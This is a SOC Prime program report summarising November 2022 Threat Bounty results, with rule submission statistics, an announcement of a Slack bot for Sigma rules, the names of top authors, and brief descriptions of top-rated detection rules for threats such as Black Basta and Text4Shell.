SOC Prime Threat Bounty —  November 2022 Results

Threat Bounty Program November

November ‘22 Publications

During the previous month, members of Threat Bounty community submitted 433 rules for publication to the SOC Prime Platform. A number of rules were automatically rejected on the stage of automated checks because of structure, syntax, logic mistakes, or content duplication and were not sent to review by SOC Prime experts. In November, 123 detections passed the SOC Prime review and were published to the Platform for monetization.

Explore Detections

To learn more about the common reason for publication rejection and main acceptance criteria, please see the SOC PRIME THREAT BOUNTY — OCTOBER 2022 RESULTS.

To ensure that your content qualifies for publication to the Platform via Threat Bounty Program, we recommend you research the existing content on the SOC Prime Platform using the Lucene query search, and pay attention to the rules naming, descriptions, and references to the resources, and relevant MITRE ATT&CK® tags. Please mind that Sigma rules which are entirely based on alerts of other security solutions are not accepted for publication via Threat Bounty Program. Also, while creating the rule, it is essential that authors make the changes and improvements suggested by the automated check as per provided suggestions.

Sigma Rules Bot for Threat Bounty

The Sigma Rules Bot, actively used by advanced Threat Bounty content developers, is officially released to the Slack App Directory. With Sigma Rules Bot, members of the Threat Bounty community can create rules directly in Slack, test them for common issues, including syntax mistakes and the uniqueness of the detection logic, and send the rules to review by SOC Prime. While the SOC Prime review, which is a mandatory step for publishing rules to the Platform for monetization, the SOC Prime experts can now reach out to the content author via the Slack Bot by opening a chat linked to a specific suggested Sigma rule. 

The Sigma Rules Bot provides an easy and seamless way to improve and monetize detection engineering skills by publishing unique threat detection Sigma rules to the SOC Prime Platform. See the step-by-step guide for more details.

Top Authors

The Threat Bounty detections published by these authors gained the most rating on Threat Detection Marketplace:

Nattatorn Chuensangarun

Osman Demir

Sittikorn Sangrattanapitak

Kyaw Pyiyt Htet

Emir Erdogan

The average Threat Bounty reward payout for November is $1,647.

Top-Rated Content

Suspicious FIN7’s Black Basta Ransomware Operation By Detection of Associated Events (via registry_key) threat hunting Sigma rule by Kyaw Pyiyt Htet (Mik0yan) detects the persistent registry run keys used by FIN7’s Black Basta ransomware operation.

Possible Initial Access by Text4Shell Template Injection [CVE-2022-42889] (via proxy) threat hunting Sigma rule by Kyaw Pyiyt Htet (Mik0yan) detects key words in the URI field of HTTP requests that are known to be used in exploitation of the Text4Shell vulnerability. See the article for more information.

Possible Black-Basta Attack [QakBot] (November 2022) Lateral Movement Activity By Detection of Associated Process (via process_creation) threat hunting Sigma rule by Zaw Min Htun (ZETA) detects executing Cobalt Strike payload with the rundll32.exe SetVolume commands by Black Basta. The threat actor leveraging Qakbot and potentially widespread campaign being run by Black Basta operators.

Possible Toneshell Backdoor Persistence by Detection of Associated Scheduled Task (via process_creation) threat hunting Sigma rule by Aytek Aytemur detects suspicious scheduled task creation in order to establish persistence using Toneshell Backdoor, which was associated with the Earth Preta APT Group.

Possible Qbot Malware Collection Data by Using OpenWith Process with Follina Exploit [CVE-2022-30190] (via process_creation) threat hunting Sigma rule by Nattatorn Chuensangarun ​​detects suspicious Qbot malware activity by using OpenWith process to collection data through Follina exploit vulnerability (CVE-2022-30190).

Code the way to your proven cybersecurity expertise with SOC Prime Threat Bounty Program and earn cash with your own detection rules published to the Detection as Code Platform.